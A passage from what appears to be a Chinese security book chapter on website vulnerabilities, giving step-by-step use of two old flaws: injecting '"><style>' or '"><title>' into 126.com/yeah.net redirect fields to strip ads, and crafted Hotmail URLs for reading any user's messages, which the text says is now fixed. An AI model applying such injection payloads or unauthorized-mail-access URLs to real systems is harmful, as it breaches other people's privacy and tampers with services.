4.4 网站存在的安全漏洞
网站只有相对的安全,没有绝对的安全。因为旧的漏洞补好后,又有新的漏洞逐渐被人们发现。在这里将介绍两个典型的网站安全漏洞,这些都是由于网站管理人员在编写脚本时的疏忽而造成的。
4.4.1 去除my.126.com免费域名网易广告
去除网易广告最简单,加入最少的代码就可以实现。这主要是由于CGI编写时疏忽造成的漏洞。接下来展现一下<style>、<title>漏洞的新运用。
打开http://my.126.com网页,单击【开始申请】或是单击【登录】按钮,进入相关网页后,在申请或者修改主页指向的地址时,后面加上以下代码就可以去除弹出的广告:
"><style>
例如:
http://你想转向的主页地址>"<style>
在126.com或者yeah.net的转向域名里设置
(1) 如果要申请转向的域名为126.com里, 在【您想转向的主页地址:】文本框输入:庭湖http://youurl"><style>,示意图见图4-21。
图4-21 申请域名转向
(2) 如果要申请转向的域名为yeah.net,则在【您想转向的主页地址:】中输入:
http://youurl"><title>
(3) 如果修改以前申请的域名,在如图4-22所示的【修改您的URL:】文本框中输入:
http://youurl"><title>
图4-22 修改域名
申请或是修改完成后,在访问新的域名时就可去除弹出的广告,如图4-23所示。换句话说就是输入站点网址后面紧接输入:"><style> 就可以破除广告。
图4-23 申请域名转向成功
4.4.2 Hotmail的漏洞
Hotmail是一家专门提供免费E-mail服务的网站,可以说是球最大的免费E-mail服务的网站。但 Hotmail也暴露出其严重的漏洞,即在浏览器中输入一个特殊的链接地址就可以查看任意Hotmail用户的信件内容。接下来看看Hotmail的漏洞利用方法(此漏洞现已 修复)。
(1) 必须拥有一个Hotmail的用户账号。
(2) 使用以下面的链接地址去查看特殊的用户的特殊的消息:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%
3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%
26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%
3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%
26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com
内容解释
MSG943322803%2e16:消息的编号。
Username:要查看的Hotmail账号的用户名,如果想查看emailbox view中的E-mail,就要去掉%26raw%3d0;如果不要Hotmail的顶端的风格,就去掉&hm___fl=attrd&domain= hotmail.com。
